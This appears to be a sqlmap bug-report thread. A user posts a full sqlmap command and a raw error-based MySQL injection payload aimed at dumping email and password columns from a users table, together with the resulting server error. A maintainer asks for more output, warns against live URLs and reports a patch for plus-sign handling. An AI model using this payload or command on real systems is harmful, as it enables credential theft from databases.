error-based false

[chym]

i used sqlmap test sql vulnerable on my site but sqlmap can't dump data

--random-agent -u xyz --data="submits=+ssssss+&username=l*&password=&x=45&y=7" -D ht_db -T en_users -C mail,password --dump --no-cast --hex -v 3

i test with live header on firefox with sqlmap syntax 👍

post : xyz?md=login
data: submits=+ssssss+&username=l' AND (SELECT 9275 FROM(SELECT COUNT(*),CONCAT(0x3a6c65663a,(SELECT MID((HEX(password)),1,50) FROM ht_db.en_users ORDER BY mail LIMIT 82,1),0x3a7266653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EBZd'='EBZd&password=&x=35&y=16

and respond :

MySQL Error
Message: MySQL Query Error
SQL: select count(username) as counts from en_users where username='l' AND (SELECT 6076 FROM(SELECT COUNT(*),CONCAT(0x3a6c65663a,(SELECT MID((HEX(password)),1,50) FROM ht_db.en_users ORDER BY mail LIMIT 49,1),0x3a7266653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'lyfN'='lyfN' and password='d41d8cd98f00b204e9800998ecf8427e' and ch=1
Error: Unknown column 'mail' in 'order clause'
Errno.: 1054

seem "order by" can't use in case , pls fix it

tks

[stamparm]

you haven't told if sqlmap can find the SQLi vulnerability in the first place. if yes, then please put the whole injection console output (e.g. parameter ... is vulnerable to....).

also, please don't put live URLs into Issue tickets

[stamparm]

@chym could you please give more details here (as stated in previous comment)

[stamparm]

Plus sign was used here in a special manner (representing space character in url encoded data). Patched now